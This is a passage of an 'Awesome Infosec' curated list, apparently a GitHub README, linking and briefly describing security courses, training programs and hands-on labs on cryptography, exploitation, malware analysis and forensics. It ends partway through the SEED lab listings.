Awesome Infosec =============== [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome) A curated list of awesome information security resources, inspired by the awesome-* trend on GitHub. Those resources and tools are intended only for cybersecurity professional and educational use in a controlled environment. Table of Contents ================= 1. [Massive Online Open Courses](#massive-online-open-courses) 2. [Academic Courses](#academic-courses) 3. [Laboratories](#laboratories) 4. [Capture the Flag](#capture-the-flag) 5. [Open Security Books](#open-security-books) 6. [Challenges](#challenges) 7. [Documentation](#documentation) 8. [SecurityTube Playlists](#securitytube-playlists) 9. [Related Awesome Lists](#related-awesome-lists) 10. [Contributing](#contributing) 11. [License](#license) Massive Online Open Courses =========================== #### Stanford University - Computer Security In this class you will learn how to design secure systems and write secure code. You will learn how to find vulnerabilities in code and how to design software systems that limit the impact of security vulnerabilities. We will focus on principles for building secure systems and give many real world examples. - [Stanford University - Computer Security](https://www.coursera.org/learn/security) #### Stanford University - Cryptography I This course explains the inner workings of cryptographic primitives and how to correctly use them. Students will learn how to reason about the security of cryptographic constructions and how to apply this knowledge to real-world applications. The course begins with a detailed discussion of how two parties who have a shared secret key can communicate securely when a powerful adversary eavesdrops and tampers with traffic. We will examine many deployed protocols and analyze mistakes in existing systems. The second half of the course discusses public-key techniques that let two or more parties generate a shared secret key. We will cover the relevant number theory and discuss public-key encryption and basic key-exchange. Throughout the course students will be exposed to many exciting open problems in the field. - [Stanford University - Cryptography I](https://www.coursera.org/learn/crypto) #### Stanford University - Cryptography II This course is a continuation of Crypto I and explains the inner workings of public-key systems and cryptographic protocols. Students will learn how to reason about the security of cryptographic constructions and how to apply this knowledge to real-world applications. The course begins with constructions for digital signatures and their applications. We will then discuss protocols for user authentication and zero-knowledge protocols. Next we will turn to privacy applications of cryptography supporting anonymous credentials and private database lookup. We will conclude with more advanced topics including multi-party computation and elliptic curve cryptography. - [Stanford University - Cryptography II](https://www.coursera.org/learn/crypto2) #### University of Maryland - Usable Security This course focuses on how to design and build secure systems with a human-centric focus. We will look at basic principles of human-computer interaction, and apply these insights to the design of secure systems with the goal of developing security measures that respect human performance and their goals within a system. - [University of Maryland - Usable Security](https://www.coursera.org/learn/usablesec) #### University of Maryland - Software Security This course we will explore the foundations of software security. We will consider important software vulnerabilities and attacks that exploit them -- such as buffer overflows, SQL injection, and session hijacking -- and we will consider defenses that prevent or mitigate these attacks, including advanced testing and program analysis techniques. Importantly, we take a "build security in" mentality, considering techniques at each phase of the development cycle that can be used to strengthen the security of software systems. - [University of Maryland - Software Security](https://www.coursera.org/learn/softwaresec) #### University of Maryland - Cryptography This course will introduce you to the foundations of modern cryptography, with an eye toward practical applications. We will learn the importance of carefully defining security; of relying on a set of well-studied "hardness assumptions" (e.g., the hardness of factoring large numbers); and of the possibility of proving security of complicated constructions based on low-level primitives. We will not only cover these ideas in theory, but will also explore their real-world impact. You will learn about cryptographic primitives in wide use today, and see how these can be combined to develop modern protocols for secure communication. - [University of Maryland - Cryptography](https://www.coursera.org/learn/cryptography) #### University of Maryland - Hardware Security This course will introduce you to the foundations of modern cryptography, with an eye toward practical applications. We will learn the importance of carefully defining security; of relying on a set of well-studied “hardness assumptions” (e.g., the hardness of factoring large numbers); and of the possibility of proving security of complicated constructions based on low-level primitives. We will not only cover these ideas in theory, but will also explore their real-world impact. You will learn about cryptographic primitives in wide use today, and see how these can be combined to develop modern protocols for secure communication. - [University of Maryland - Hardware Security](https://www.coursera.org/learn/hardwaresec) #### University of Washington - Introduction to CyberSecurity This course will introduce you to the cybersecurity, ideal for learners who are curious about the world of Internet security and who want to be literate in the field. This course will take a ride in to cybersecurity feild for beginners. - [University of Washington - Introduction to CyberSecurity](https://www.edx.org/course/introduction-to-cybersecurity) #### University of Washington - Finding Your Cybersecurity Career Path There are 5-6 major job roles in industry for cybersecurity enthusiast. In This course you will Learn about different career pathways in cybersecurity and complete a self-assessment project to better understand the right path for you. - [University of Washington - Finding Your Cybersecurity Career Path](https://www.edx.org/course/finding-your-cybersecurity-career-path) #### University of Washington - Essentials of Cybersecurity This course is good for beginner It contains introduction to cybersecurity, The CISO's view, Helps you building cybersecurity toolKit and find your cybersecurity career path. - [University of Washington - Essentials of Cybersecurity](https://www.edx.org/professional-certificate/uwashingtonx-essentials-cybersecurity) Academic Courses ================ #### NYU Tandon School of Engineering - OSIRIS Lab's Hack Night Developed from the materials of NYU Tandon's old Penetration Testing and Vulnerability Analysis course, Hack Night is a sobering introduction to offensive security. A lot of complex technical content is covered very quickly as students are introduced to a wide variety of complex and immersive topics over thirteen weeks. - [NYU Tandon's OSIRIS Lab's Hack Night](https://github.com/isislab/Hack-Night) #### Florida State University's - Offensive Computer Security The primary incentive for an attacker to exploit a vulnerability, or series of vulnerabilities is to achieve a return on an investment (his/her time usually). This return need not be strictly monetary, an attacker may be interested in obtaining access to data, identities, or some other commodity that is valuable to them. The field of penetration testing involves authorized auditing and exploitation of systems to assess actual system security in order to protect against attackers. This requires thorough knowledge of vulnerabilities and how to exploit them. Thus, this course provides an introductory but comprehensive coverage of the fundamental methodologies, skills, legal issues, and tools used in white hat penetration testing and secure system administration. * [Offensive Computer Security - Spring 2014](http://www.cs.fsu.edu/~redwood/OffensiveComputerSecurity) * [Offensive Computer Security - Spring 2013](http://www.cs.fsu.edu/~redwood/OffensiveSecurity) #### Florida State University's - Offensive Network Security This class allows students to look deep into know protocols (i.e. IP, TCP, UDP) to see how an attacker can utilize these protocols to their advantage and how to spot issues in a network via captured network traffic. The first half of this course focuses on know protocols while the second half of the class focuses on reverse engineering unknown protocols. This class will utilize captured traffic to allow students to reverse the protocol by using known techniques such as incorporating bioinformatics introduced by Marshall Beddoe. This class will also cover fuzzing protocols to see if the server or client have vulnerabilities. Overall, a student finishing this class will have a better understanding of the network layers, protocols, and network communication and their interaction in computer networks. * [Offensive Network Security](http://www.cs.fsu.edu/~lawrence/OffNetSec/) #### Rensselaer Polytechnic Institute - Malware Analysis This course will introduce students to modern malware analysis techniques through readings and hands-on interactive analysis of real-world samples. After taking this course students will be equipped with the skills to analyze advanced contemporary malware using both static and dynamic analysis. - [CSCI 4976 - Fall '15 Malware Analysis](https://github.com/RPISEC/Malware) #### Rensselaer Polytechnic Institute - Modern Binary Exploitation This course will start off by covering basic x86 reverse engineering, vulnerability analysis, and classical forms of Linux-based userland binary exploitation. It will then transition into protections found on modern systems (Canaries, DEP, ASLR, RELRO, Fortify Source, etc) and the techniques used to defeat them. Time permitting, the course will also cover other subjects in exploitation including kernel-land and Windows based exploitation. * [CSCI 4968 - Spring '15 Modern Binary Exploitation](https://github.com/RPISEC/MBE) #### Rensselaer Polytechnic Institute - Hardware Reverse Engineering Reverse engineering techniques for semiconductor devices and their applications to competitive analysis, IP litigation, security testing, supply chain verification, and failure analysis. IC packaging technologies and sample preparation techniques for die recovery and live analysis. Deprocessing and staining methods for revealing features bellow top passivation. Memory technologies and appropriate extraction techniques for each. Study contemporary anti-tamper/anti-RE methods and their effectiveness at protecting designs from attackers. Programmable logic microarchitecture and the issues involved with reverse engineering programmable logic. - [CSCI 4974/6974 - Spring '14 Hardware Reverse Engineering](http://security.cs.rpi.edu/courses/hwre-spring2014/) #### City College of San Francisco - Sam Bowne Class - [CNIT 40: DNS Security ](https://samsclass.info/40/40_F16.shtml)<br> DNS is crucial for all Internet transactions, but it is subject to numerous security risks, including phishing, hijacking, packet amplification, spoofing, snooping, poisoning, and more. Learn how to configure secure DNS servers, and to detect malicious activity with DNS monitoring. We will also cover DNSSEC principles and deployment. Students will perform hands-on projects deploying secure DNS servers on both Windows and Linux platforms. - [CNIT 120 - Network Security](https://samsclass.info/120/120_S15.shtml)<br> Knowledge and skills required for Network Administrators and Information Technology professionals to be aware of security vulnerabilities, to implement security measures, to analyze an existing network environment in consideration of known security threats or risks, to defend against attacks or viruses, and to ensure data privacy and integrity. Terminology and procedures for implementation and configuration of security, including access control, authorization, encryption, packet filters, firewalls, and Virtual Private Networks (VPNs). - [CNIT 121 - Computer Forensics](https://samsclass.info/121/121_F16.shtml)<br> The class covers forensics tools, methods, and procedures used for investigation of computers, techniques of data recovery and evidence collection, protection of evidence, expert witness skills, and computer crime investigation techniques. Includes analysis of various file systems and specialized diagnostic software used to retrieve data. Prepares for part of the industry standard certification exam, Security+, and also maps to the Computer Investigation Specialists exam. - [CNIT 123 - Ethical Hacking and Network Defense](https://samsclass.info/123/123_S17.shtml)<br> Students learn how hackers attack computers and networks, and how to protect systems from such attacks, using both Windows and Linux systems. Students will learn legal restrictions and ethical guidelines, and will be required to obey them. Students will perform many hands-on labs, both attacking and defending, using port scans, footprinting, exploiting Windows and Linux vulnerabilities, buffer overflow exploits, SQL injection, privilege escalation, Trojans, and backdoors. - [CNIT 124 - Advanced Ethical Hacking](https://samsclass.info/124/124_F15.shtml)<br> Advanced techniques of defeating computer security, and countermeasures to protect Windows and Unix/Linux systems. Hands-on labs include Google hacking, automated footprinting, sophisticated ping and port scans, privilege escalation, attacks against telephone and Voice over Internet Protocol (VoIP) systems, routers, firewalls, wireless devices, Web servers, and Denial of Service attacks. - [CNIT 126 - Practical Malware Analysis](https://samsclass.info/126/126_S16.shtml)<br> Learn how to analyze malware, including computer viruses, trojans, and rootkits, using disassemblers, debuggers, static and dynamic analysis, using IDA Pro, OllyDbg and other tools. - [CNIT 127 - Exploit Development](https://samsclass.info/127/127_S17.shtml)<br> Learn how to find vulnerabilities and exploit them to gain control of target systems, including Linux, Windows, Mac, and Cisco. This class covers how to write tools, not just how to use them; essential skills for advanced penetration testers and software security professionals. - [CNIT 128 - Hacking Mobile Devices](https://samsclass.info/128/128_S17.shtml)<br> Mobile devices such as smartphones and tablets are now used for making purchases, emails, social networking, and many other risky activities. These devices run specialized operating systems have many security problems. This class will cover how mobile operating systems and apps work, how to find and exploit vulnerabilities in them, and how to defend them. Topics will include phone call, voicemail, and SMS intrusion, jailbreaking, rooting, NFC attacks, malware, browser exploitation, and application vulnerabilities. Hands-on projects will include as many of these activities as are practical and legal. - [CNIT 129S: Securing Web Applications](https://samsclass.info/129S/129S_F16.shtml)<br> Techniques used by attackers to breach Web applications, and how to protect them. How to secure authentication, access, databases, and back-end components. How to protect users from each other. How to find common vulnerabilities in compiled code and source code. - [CNIT 140: IT Security Practices](https://samsclass.info/140/140_F16.shtml)<br> Training students for cybersecurity competitions, including CTF events and the [Collegiate Cyberdefense Competition (CCDC)](http://www.nationalccdc.org/). This training will prepare students for employment as security professionals, and if our team does well in the competitions, the competitors will gain recognition and respect which should lead to more and better job offers. - [Violent Python and Exploit Development](https://samsclass.info/127/127_WWC_2014.shtml)<br> In the exploit development section, students will take over vulnerable systems with simple Python scripts. #### University of Cincinnati - CS6038/CS5138 Malware Analysis This class will introduce the CS graduate students to malware concepts, malware analysis, and black-box reverse engineering techniques. The target audience is focused on computer science graduate students or undergraduate seniors without prior cyber security or malware experience. It is intended to introduce the students to types of malware, common attack recipes, some tools, and a wide array of malware analysis techniques. - [CS6038/CS5138 Malware Analysis](https://class.malware.re/) #### Eurecom - Mobile Systems and Smartphone Security (MOBISEC) Hands-On course coverings topics such as mobile ecosystem, the design and architecture of mobile operating systems, application analysis, reverse engineering, malware detection, vulnerability assessment, automatic static and dynamic analysis, and exploitation and mitigation techniques. Besides the slides for the course, there are also multiple challenges covering mobile app development, reversing and exploitation. - [MOBISEC2018](https://mobisec.reyammer.io/) ## Open Security Training OpenSecurityTraining.info is dedicated to sharing training material for computer security classes, on any topic, that are at least one day long. #### Beginner Classes - [Android Forensics & Security Testing](http://opensecuritytraining.info/AndroidForensics.html)<br> This class serves as a foundation for mobile digital forensics, forensics of Android operating systems, and penetration testing of Android applications. - [Certified Information Systems Security Professional (CISSP)® <br>Common Body of Knowledge (CBK)® Review](http://opensecuritytraining.info/CISSP-Main.html)<br> The CISSP CBK Review course is uniquely designed for federal agency information assurance (IA) professionals in meeting [NSTISSI-4011](http://www.cnss.gov/Assets/pdf/nstissi_4011.pdf), National Training Standard for Information Systems Security Professionals, as required by [DoD 8570.01-M](http://www.dtic.mil/whs/directives/corres/pdf/857001m.pdf), Information Assurance Workforce Improvement Program. - [Flow Analysis & Network Hunting](http://opensecuritytraining.info/Flow.html)<br> This course focuses on network analysis and hunting of malicious activity from a security operations center perspective. We will dive into the netflow strengths, operational limitations of netflow, recommended sensor placement, netflow tools, visualization of network data, analytic trade craft for network situational awareness and networking hunting scenarios. - [Hacking Techniques and Intrusion Detection](http://opensecuritytraining.info/HTID.html)<br> The course is designed to help students gain a detailed insight into the practical and theoretical aspects of advanced topics in hacking techniques and intrusion detection. - [Introductory Intel x86: Architecture, Assembly, Applications, & Alliteration](http://opensecuritytraining.info/IntroX86.html)<br> This class serves as a foundation for the follow on Intermediate level x86 class. It teaches the basic concepts and describes the hardware that assembly code deals with. It also goes over many of the most common assembly instructions. Although x86 has hundreds of special purpose instructions, students will be shown it is possible to read most programs by knowing only around 20-30 instructions and their variations. - [Introductory Intel x86-64: Architecture, Assembly, Applications, & Alliteration](http://opensecuritytraining.info/IntroX86-64.html)<br> This class serves as a foundation for the follow on Intermediate level x86 class. It teaches the basic concepts and describes the hardware that assembly code deals with. It also goes over many of the most common assembly instructions. Although x86 has hundreds of special purpose instructions, students will be shown it is possible to read most programs by knowing only around 20-30 instructions and their variations. - [Introduction to ARM](http://opensecuritytraining.info/IntroARM.html)<br> This class builds on the Intro to x86 class and tries to provide parallels and differences between the two processor architectures wherever possible while focusing on the ARM instruction set, some of the ARM processor features, and how software works and runs on the ARM processor. - [Introduction to Cellular Security](http://opensecuritytraining.info/IntroCellSec.html)<br> This course is intended to demonstrate the core concepts of cellular network security. Although the course discusses GSM, UMTS, and LTE - it is heavily focused on LTE. The course first introduces important cellular concepts and then follows the evolution of GSM to LTE. - [Introduction to Network Forensics](http://opensecuritytraining.info/NetworkForensics.html)<br> This is a mainly lecture based class giving an introduction to common network monitoring and forensic techniques. - [Introduction to Secure Coding](http://opensecuritytraining.info/IntroSecureCoding.html)<br> This course provides a look at some of the most prevalent security related coding mistakes made in industry today. Each type of issue is explained in depth including how a malicious user may attack the code, and strategies for avoiding the issues are then reviewed. - [Introduction to Vulnerability Assessment](http://opensecuritytraining.info/IntroductionToVulnerabilityAssessment.html)<br> This is a lecture and lab based class giving an introduction to vulnerability assessment of some common common computing technologies. Instructor-led lab exercises are used to demonstrate specific tools and technologies. - [Introduction to Trusted Computing](http://opensecuritytraining.info/IntroToTrustedComputing.html)<br> This course is an introduction to the fundamental technologies behind Trusted Computing. You will learn what Trusted Platform Modules (TPMs) are and what capabilities they can provide both at an in-depth technical level and in an enterprise context. You will also learn about how other technologies such as the Dynamic Root of Trust for Measurement (DRTM) and virtualization can both take advantage of TPMs and be used to enhance the TPM's capabilities. - [Offensive, Defensive, and Forensic Techniques for Determining Web User Identity](http://opensecuritytraining.info/WebIdentity.html)<br> This course looks at web users from a few different perspectives. First, we look at identifying techniques to determine web user identities from a server perspective. Second, we will look at obfuscating techniques from a user whom seeks to be anonymous. Finally, we look at forensic techniques, which, when given a hard drive or similar media, we identify users who accessed that server. - [Pcap Analysis & Network Hunting](http://opensecuritytraining.info/Pcap.html)<br> Introduction to Packet Capture (PCAP) explains the fundamentals of how, where, and why to capture network traffic and what to do with it. This class covers open-source tools like tcpdump, Wireshark, and ChopShop in several lab exercises that reinforce the material. Some of the topics include capturing packets with tcpdump, mining DNS resolutions using only command-line tools, and busting obfuscated protocols. This class will prepare students to tackle common problems and help them begin developing the skills to handle more advanced networking challenges. - [Malware Dynamic Analysis](http://opensecuritytraining.info/MalwareDynamicAnalysis.html)<br> This introductory malware dynamic analysis class is dedicated to people who are starting to work on malware analysis or who want to know what kinds of artifacts left by malware can be detected via various tools. The class will be a hands-on class where students can use various tools to look for how malware is: Persisting, Communicating, and Hiding - [Secure Code Review](http://opensecuritytraining.info/SecureCodeReview.html)<br> The course briefly talks about the development lifecycle and the importance of peer reviews in delivering a quality product. How to perform this review is discussed and how to keep secure coding a priority during the review is stressed. A variety of hands-on exercises will address common coding mistakes, what to focus on during a review, and how to manage limited time. - [Smart Cards](http://opensecuritytraining.info/SmartCards.html)<br> This course shows how smart cards are different compared to other type of cards. It is explained how smart cards can be used to realize confidentiality and integrity of information. - [The Life of Binaries](http://opensecuritytraining.info/LifeOfBinaries.html)<br> Along the way we discuss the relevance of security at different stages of a binary’s life, from the tricks that can be played by a malicious compiler, to how viruses really work, to the way which malware “packers” duplicate OS process execution functionality, to the benefit of a security-enhanced OS loader which implements address space layout randomization (ASLR). - [Understanding Cryptology: Core Concepts](http://opensecuritytraining.info/CryptoCore.html)<br> This is an introduction to cryptology with a focus on applied cryptology. It was designed to be accessible to a wide audience, and therefore does not include a rigorous mathematical foundation (this will be covered in later classes). - [Understanding Cryptology: Cryptanalysis](http://opensecuritytraining.info/Cryptanalysis.html)<br> A class for those who want to stop learning about building cryptographic systems and want to attack them. This course is a mixture of lecture designed to introduce students to a variety of code-breaking techniques and python labs to solidify those concepts. Unlike its sister class, [Core Concepts](http://opensecuritytraining.info/CryptoCore.html), math is necessary for this topic. #### Intermediate Classes - [Exploits 1: Introduction to Software Exploits](http://opensecuritytraining.info/Exploits1.html)<br> Software vulnerabilities are flaws in program logic that can be leveraged by an attacker to execute arbitrary code on a target system. This class will cover both the identification of software vulnerabilities and the techniques attackers use to exploit them. In addition, current techniques that attempt to remediate the threat of software vulnerability exploitation will be discussed. - [Exploits 2: Exploitation in the Windows Environment](http://opensecuritytraining.info/Exploits2.html)<br> This course covers the exploitation of stack corruption vulnerabilities in the Windows environment. Stack overflows are programming flaws that often times allow an attacker to execute arbitrary code in the context of a vulnerable program. There are many nuances involved with exploiting these vulnerabilities in Windows. Window's exploit mitigations such as DEP, ASLR, SafeSEH, and SEHOP, makes leveraging these programming bugs more difficult, but not impossible. The course highlights the features and weaknesses of many the exploit mitigation techniques deployed in Windows operating systems. Also covered are labs that describe the process of finding bugs in Windows applications with mutation based fuzzing, and then developing exploits that target those bugs. - [Intermediate Intel x86: Architecture, Assembly, Applications, & Alliteration](http://opensecuritytraining.info/IntermediateX86.html)<br> Building upon the Introductory Intel x86 class, this class goes into more depth on topics already learned, and introduces more advanced topics that dive deeper into how Intel-based systems work. #### Advanced Classes - [Advanced x86: Virtualization with Intel VT-x](http://opensecuritytraining.info/AdvancedX86-VTX.html)<br> The purpose of this course is to provide a hands on introduction to Intel hardware support for virtualization. The first part will motivate the challenges of virtualization in the absence of dedicated hardware. This is followed by a deep dive on the Intel virtualization "API" and labs to begin implementing a blue pill / hyperjacking attack made famous by researchers like Joanna Rutkowska and Dino Dai Zovi et al. Finally a discussion of virtualization detection techniques. - [Advanced x86: Introduction to BIOS & SMM](http://opensecuritytraining.info/IntroBIOS.html)<br> We will cover why the BIOS is critical to the security of the platform. This course will also show you what capabilities and opportunities are provided to an attacker when BIOSes are not properly secured. We will also provide you tools for performing vulnerability analysis on firmware, as well as firmware forensics. This class will take people with existing reverse engineering skills and teach them to analyze UEFI firmware. This can be used either for vulnerability hunting, or to analyze suspected implants found in a BIOS, without having to rely on anyone else. - [Introduction to Reverse Engineering Software](http://opensecuritytraining.info/IntroductionToReverseEngineering.html)<br> Throughout the history of invention curious minds have sought to understand the inner workings of their gadgets. Whether investigating a broken watch, or improving an engine, these people have broken down their goods into their elemental parts to understand how they work. This is Reverse Engineering (RE), and it is done every day from recreating outdated and incompatible software, understanding malicious code, or exploiting weaknesses in software. - [Reverse Engineering Malware](http://opensecuritytraining.info/ReverseEngineeringMalware.html)<br> This class picks up where the [Introduction to Reverse Engineering Software](http://opensecuritytraining.info/IntroductionToReverseEngineering.html) course left off, exploring how static reverse engineering techniques can be used to understand what a piece of malware does and how it can be removed. - [Rootkits: What they are, and how to find them](http://opensecuritytraining.info/Rootkits.html)<br> Rootkits are a class of malware which are dedicated to hiding the attacker’s presence on a compromised system. This class will focus on understanding how rootkits work, and what tools can be used to help find them. - [The Adventures of a Keystroke: An in-depth look into keylogging on Windows](http://opensecuritytraining.info/Keylogging.html)<br> Keyloggers are one of the most widely used components in malware. Keyboard and mouse are the devices nearly all of the PCs are controlled by, this makes them an important target of malware authors. If someone can record your keystrokes then he can control your whole PC without you noticing. ## Cybrary - Online Cyber Security Training - [CompTIA A+](https://www.cybrary.it/course/comptia-aplus)<br> This course covers the fundamentals of computer technology, basic networking, installation and configuration of PCs, laptops and related hardware, as well as configuring common features for mobile operation systems Android and Apple iOS. - [CompTIA Linux+](https://www.cybrary.it/course/comptia-linux-plus)<br> Our free, self-paced online Linux+ training prepares students with the knowledge to become a certified Linux+ expert, spanning a curriculum that covers Linux maintenance tasks, user assistance and installation and configuration. - [CompTIA Cloud+](https://www.cybrary.it/course/comptia-cloud-plus)<br> Our free, online Cloud+ training addresses the essential knowledge for implementing, managing and maintaining cloud technologies as securely as possible. It covers cloud concepts and models, virtualization, and infrastructure in the cloud. - [CompTIA Network+](https://www.cybrary.it/course/comptia-network-plus)<br> In addition to building one’s networking skill set, this course is also designed to prepare an individual for the Network+ certification exam, a distinction that can open a myriad of job opportunities from major companies - [CompTIA Advanced Security Practitioner](https://www.cybrary.it/course/comptia-casp)<br> In our free online CompTIA CASP training, you’ll learn how to integrate advanced authentication, how to manage risk in the enterprise, how to conduct vulnerability assessments and how to analyze network security concepts and components. - [CompTIA Security+](https://www.cybrary.it/course/comptia-security-plus)<br> Learn about general security concepts, basics of cryptography, communications security and operational and organizational security. With the increase of major security breaches that are occurring, security experts are needed now more than ever. - [ITIL Foundation](https://www.cybrary.it/course/itil)<br> Our online ITIL Foundation training course provides baseline knowledge for IT service management best practices: how to reduce costs, increase enhancements in processes, improve IT productivity and overall customer satisfaction. - [Cryptography](https://www.cybrary.it/course/cryptography)<br> In this online course we will be examining how cryptography is the cornerstone of security technologies, and how through its use of different encryption methods you can protect private or sensitive information from unauthorized access. - [Cisco CCNA](https://www.cybrary.it/course/cisco-ccna)<br> Our free, online, self-paced CCNA training teaches students to install, configure, troubleshoot and operate LAN, WAN and dial access services for medium-sized networks. You’ll also learn how to describe the operation of data networks. - [Virtualization Management](https://www.cybrary.it/course/virtualization-management)<br> Our free, self-paced online Virtualization Management training class focuses on installing, configuring and managing virtualization software. You’ll learn how to work your way around the cloud and how to build the infrastructure for it. - [Penetration Testing and Ethical Hacking](https://www.cybrary.it/course/ethical-hacking)<br> If the idea of hacking as a career excites you, you’ll benefit greatly from completing this training here on Cybrary. You’ll learn how to exploit networks in the manner of an attacker, in order to find out how protect the system from them. - [Computer and Hacking Forensics](https://www.cybrary.it/course/computer-hacking-forensics-analyst)<br> Love the idea of digital forensics investigation? That’s what computer forensics is all about. You’ll learn how to; determine potential online criminal activity at its inception, legally gather evidence, search and investigate wireless attacks. - [Web Application Penetration Testing](https://www.cybrary.it/course/web-application-pen-testing)<br> In this course, SME, Raymond Evans, takes you on a wild and fascinating journey into the cyber security discipline of web application pentesting. This is a very hands-on course that will require you to set up your own pentesting environment. - [CISA - Certified Information Systems Auditor](https://www.cybrary.it/course/cisa)<br> In order to face the dynamic requirements of meeting enterprise vulnerability management challenges, this course covers the auditing process to ensure that you have the ability to analyze the state of your organization and make changes where needed. - [Secure Coding](https://www.cybrary.it/course/secure-coding)<br> Join industry leader Sunny Wear as she discusses secure coding guidelines and how secure coding is important when it comes to lowering risk and vulnerabilities. Learn about XSS, Direct Object Reference, Data Exposure, Buffer Overflows, & Resource Management. - [NIST 800-171 Controlled Unclassified Information Course](https://www.cybrary.it/course/nist-800-171-controlled-unclassified-information-course)<br> The Cybrary NIST 800-171 course covers the 14 domains of safeguarding controlled unclassified information in non-federal agencies. Basic and derived requirements are presented for each security domain as defined in the NIST 800-171 special publication. - [Advanced Penetration Testing](https://www.cybrary.it/course/advanced-penetration-testing)<br> This course covers how to attack from the web using cross-site scripting, SQL injection attacks, remote and local file inclusion and how to understand the defender of the network you’re breaking into to. You’ll also learn tricks for exploiting a network. - [Intro to Malware Analysis and Reverse Engineering](https://www.cybrary.it/course/malware-analysis)<br> In this course you’ll learn how to perform dynamic and static analysis on all major files types, how to carve malicious executables from documents and how to recognize common malware tactics and debug and disassemble malicious binaries. - [Social Engineering and Manipulation](https://www.cybrary.it/course/social-engineering)<br> In this online, self-paced Social Engineering and Manipulation training class, you will learn how some of the most elegant social engineering attacks take place. Learn to perform these scenarios and what is done during each step of the attack. - [Post Exploitation Hacking](https://www.cybrary.it/course/post-exploitation-hacking)<br> In this free self-paced online training course, you’ll cover three main topics: Information Gathering, Backdooring and Covering Steps, how to use system specific tools to get general information, listener shells, metasploit and meterpreter scripting. - [Python for Security Professionals](https://www.cybrary.it/course/python)<br> This course will take you from basic concepts to advanced scripts in just over 10 hours of material, with a focus on networking and security. - [Metasploit](https://www.cybrary.it/course/metasploit)<br> This free Metasploit training class will teach you to utilize the deep capabilities of Metasploit for penetration testing and help you to prepare to run vulnerability assessments for organizations of any size. - [ISC2 CCSP - Certified Cloud Security Professional](https://www.cybrary.it/course/isc2-certified-cloud-security-professional-ccsp)<br> The reality is that attackers never rest, and along with the traditional threats targeting internal networks and systems, an entirely new variety specifically targeting the cloud has emerged. **Executive** - [CISSP - Certified Information Systems Security Professional](https://www.cybrary.it/course/cissp)<br> Our free online CISSP (8 domains) training covers topics ranging from operations security, telecommunications, network and internet security, access control systems and methodology and business continuity planning. - [CISM - Certified Information Security Manager](https://www.cybrary.it/course/cism)<br> Cybrary’s Certified Information Security Manager (CISM) course is a great fit for IT professionals looking to move up in their organization and advance their careers and/or current CISMs looking to learn about the latest trends in the IT industry. - [PMP - Project Management Professional](https://www.cybrary.it/course/project-management-professional)<br> Our free online PMP training course educates on how to initiate, plan and manage a project, as well as the process behind analyzing risk, monitoring and controlling project contracts and how to develop schedules and budgets. - [CRISC - Certified in Risk and Information Systems Control](https://www.cybrary.it/course/crisc)<br> Certified in Risk and Information Systems Control is for IT and business professionals who develop and maintain information system controls, and whose job revolves around security operations and compliance. - [Risk Management Framework](https://www.cybrary.it/course/risk-management-framework)<br> The National Institute of Standards and Technology (NIST) established the Risk Management Framework (RMF) as a set of operational and procedural standards or guidelines that a US government agency must follow to ensure the compliance of its data systems. - [ISC2 CSSLP - Certified Secure Software Life-cycle Professional](https://www.cybrary.it/course/csslp-training)<br> This course helps professionals in the industry build their credentials to advance within their organization, allowing them to learn valuable managerial skills as well as how to apply the best practices to keep organizations systems running well. - [COBIT - Control Objectives for Information and Related Technologies](https://www.cybrary.it/course/cobit)<br> Cybrary’s online COBIT certification program offers an opportunity to learn about all the components of the COBIT 5 framework, covering everything from the business end-to-end to strategies in how effectively managing and governing enterprise IT. - [Corporate Cybersecurity Management](https://www.cybrary.it/course/corporate-cybersecurity-management)<br> Cyber risk, legal considerations and insurance are often overlooked by businesses and this sets them up for major financial devastation should an incident occur. ## Hopper's Roppers Hopper's Roppers is a community dedicated to providing free training to beginners so that they have the best introduction to the field possible and have the knowledge, skills, and confidence required to figure out what the next ten thousand hours will require them to learn. - [Introduction to Computing Fundamentals](https://hoppersroppers.org/course.html)<br> A free, self-paced curriculum designed to give a beginner all of the foundational knowledge and skills required to be successful. It teaches security fundamentals along with building a strong technical foundation that students will build on for years to come. **Learning Objectives:** Linux, Hardware, Networking, Operating Systems, Power User, Scripting **Pre-Reqs:** None - [Introduction to Capture the Flags](https://hoppersroppers.github.io/courseCTF.html)<br> Free course designed to teach the fundamentals required to be successful in Capture the Flag competitions and compete in the picoCTF event. Our mentors will track your progress and provide assistance every step of the way. **Learning Objectives:** CTFs, Forensics, Cryptography, Web-Exploitation **Pre-Reqs:** Linux, Scripting - [Introduction to Security](https://hoppersroppers.github.io/courseSecurity.html)<br> Free course designed to teach students security theory and have them execute defensive measures so that they are better prepared against threats online and in the physical world. **Learning Objectives:** Security Theory, Practical Application, Real-World Examples **Pre-Reqs:** None - [Practical Skills Bootcamp](https://hoppersroppers.github.io/bootcamp.html)<br> Our free course to introduce students to Linux fundamentals and Python scripting so that they "Learn Just Enough to be Dangerous". Fastest way to get a beginner up to speed on practical knowledge. **Learning Objectives:** Linux, Scripting **Pre-Reqs:** None Laboratories ============ ## Syracuse University's SEED ### Hands-on Labs for Security Education Started in 2002, funded by a total of 1.3 million dollars from NSF, and now used by hundreds of educational institutes worldwide, the SEED project's objective is to develop hands-on laboratory exercises (called SEED labs) for computer and information security education and help instructors adopt these labs in their curricula. ### Software Security Labs These labs cover some of the most common vulnerabilities in general software. The labs show students how attacks work in exploiting these vulnerabilities. - [Buffer-Overflow Vulnerability Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Buffer_Overflow)<br> Launching attack to exploit the buffer-overflow vulnerability using shellcode. Conducting experiments with several countermeasures. - [Return-to-libc Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Return_to_libc)<br> Using the return-to-libc technique to defeat the "non-executable stack" countermeasure of the buffer-overflow attack. - [Environment Variable and Set-UID Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Environment_Variable_and_SetUID)<br> This is a redesign of the Set-UID lab (see below). - [Set-UID Program Vulnerability Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Set-UID)<br> Launching attacks on privileged Set-UID root program. Risks of environment variables. Side effects of system(). - [Race-Condition Vulnerability Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Race_Condition)<br> Exploiting the race condition vulnerability in privileged program. Conducting experiments with various countermeasures. - [Format-String Vulnerability Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Format_String)<br> Exploiting the format string vulnerability to crash a program, steal sensitive information, or modify critical data. - [Shellshock Attack 